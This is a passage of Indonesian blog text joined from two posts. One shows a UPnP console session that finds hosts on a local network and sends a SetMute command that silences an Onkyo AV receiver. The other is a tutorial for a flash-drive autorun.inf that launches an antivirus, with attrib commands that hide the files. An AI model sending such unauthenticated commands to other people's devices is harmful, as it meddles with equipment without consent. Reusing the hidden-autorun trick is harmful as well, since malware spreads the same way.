[2] 192.168.1.215:8060
[3] 192.168.1.224:52236
[4] 192.168.1.214:52235
[5] 192.168.1.241:8888
[6] 192.168.1.16:2869

Mari kita lihat data yang ada pada host 5:
upnp> host summary 5
Host: 192.168.1.241:8888 XML File: http://192.168.1.241:8888/upnp_descriptor_0 MediaRenderer manufacturerURL: http://www.onkyo.com modelName: TX-NR509 modelNumber: TX-NR509 presentationURL: http://192.168.1.241/ friendlyName: TX-NR509 fullName: urn:schemas-upnp-org:device:MediaRenderer:1 modelDescription: AV Receiver UDN: uuid:aeb01704-c117-04b9-db1e-0409c1b9c871 modelURL: http://www.onkyo.com manufacturer: ONKYO

Untuk melihat lebih lanjut lakukan host info 5
upnp> host info 5
xmlFile : http://192.168.1.241:8888/upnp_descriptor_0 name : 192.168.1.241:8888 proto : http:// serverType : MediabolicMWEB/1.8.225 upnpServer : Linux/2.6.33-rc4 UPnP/1.0 MediabolicUPnP/1.8.225 dataComplete : True deviceList : {}

Dapat diketahui bahwa host no 5 adalah sebuah tv internet yang menggunakan Linux, sekarang dengan sedikit perintah kita dapat mematikan volume suara pada tv tersebut:

upnp> host send 5 MediaRenderer RenderingControl SetMute

Required argument:
Argument Name: InstanceID
Data Type: ui4
Allowed Values: []
Set InstanceID value to: 0

Required argument:
Argument Name: DesiredMute
Data Type: boolean
Allowed Values: []
Set DesiredMute value to: 1

Required argument:
Argument Name: Channel
Data Type: string
Allowed Values: ['Master', 'LF', 'RF']
Set Channel value to: Master


Dan tv pun dalam kondisi MUTE, tidak bersuara sama sekali….

Ngeri bukan klo ada yang dapat melakukan ini pada perangkat elektronik kita yang terhubung dengan jaringan?? :hammer

Tapi klo dilihat lagi keren juga ya? hehehe

Tampaknya banyak juga tulisan kali ini….baiklah saatnya saya undur diri untuk istirahat,

Semoga bermanfaat

Sumber ikonspirasi.com

akhirnya buat juga blog pengganti dari blog ku yg dlu smilenetstar.wordpress.com yg kini telah di suspended dari pihak Wp nya T_T, mempung masih bru dan blom selesai di edit2 menuNya buat post perdana dlu ^^
ini sebenarnya udah basih udah lama, dari blog pertama dlu tp g'papa di post di blog ini lagi ^_-

Cara buat antivirus di fd (flashdisk) sbb :

pertama-tama buatlah AUTORUN untuk menjalangkan antivirus pada fd (flashdisk) !, carax copy
antivirus yg berukurang kecil ke fd (flashdisk) kita, sembarang maunya antivirus apa
contonya PCMAV,ANSAV....dll (dicontoh kali ini saya menggunakan PCMAV karna ukurangx kecil
bangat ngak sampe 3 MB). oke deh...kita buat scrip dulu untuk autorun di fd kita....
tinggal ketik or copy aja di notepad

============potong disini============

[AUTORUN]
open=nama antivirus.exe
shellexecute=nama antivirus.exe
shell\scan_viruz_dulu_donkz:-)_!!!\command=nama antivirus.exe
shell=scan_viruz_dulu_donkz:-)_!!!

============potong disini============

kalo udah kita save dengan nama "autorun.inf" (ngak pake tanda kutip) di fd kita
sekarang kita copy aja antivirusnya ke fd..!!!
(ingat kalo ngopy file autorun dan antivirusnya bukan di dalam folder, ingat yah...!!!).

Jadi deh..^_^ kalo mau scan virus tinggal double click aja tuh drive fd-nya *=*
terus kalo kita klik kanan drive fd-nya BUKANKAH ADA TAMBAHAN KATA DI ATAS KATA AUTOPLAY.
&lt;scan_viruz_dulu_donkz:-)_!!!.....adakan ^_^ ehhhhhhhhh......
kalo mau diubah ganti aja kata dalam scrip

----------------------------------
-   shell\kata anda\command=nama antivirus.exe
-   shell=kata anda
----------------------------------

Lho...gimana cara buka fdnya (#@#$$#%#@) !!!
^_^tinggal di klik kanan aja terus open gampangkan
oyah..gak bagus yah kalo di dalam fd kita ada nama file AUTORUN dan antivirusnya...
merusak pemandangan aja ^_^
kalo gitu kita super hidden aja (itu nama gaulnya)heeeee caranya...?

-    buka RUN dari start menu
-    terus ketik cmd
-    abiz itu...kita masuk kedalam drive fdnya (biasanya di drive f:)
-    udah gitu kita tulis commandnya.
f:\&gt;attrib +h +s nama antivirusnya.exe (buat sembunyiin antivirusnya)
f:\&gt;attrib +h +s autorun.inf (buat hidden file autorunnya)

entar ..^_^..ilang deh filenya........*=*

FDnya siap dipergunakan
huh.....selesai deh proyek kita.....^_^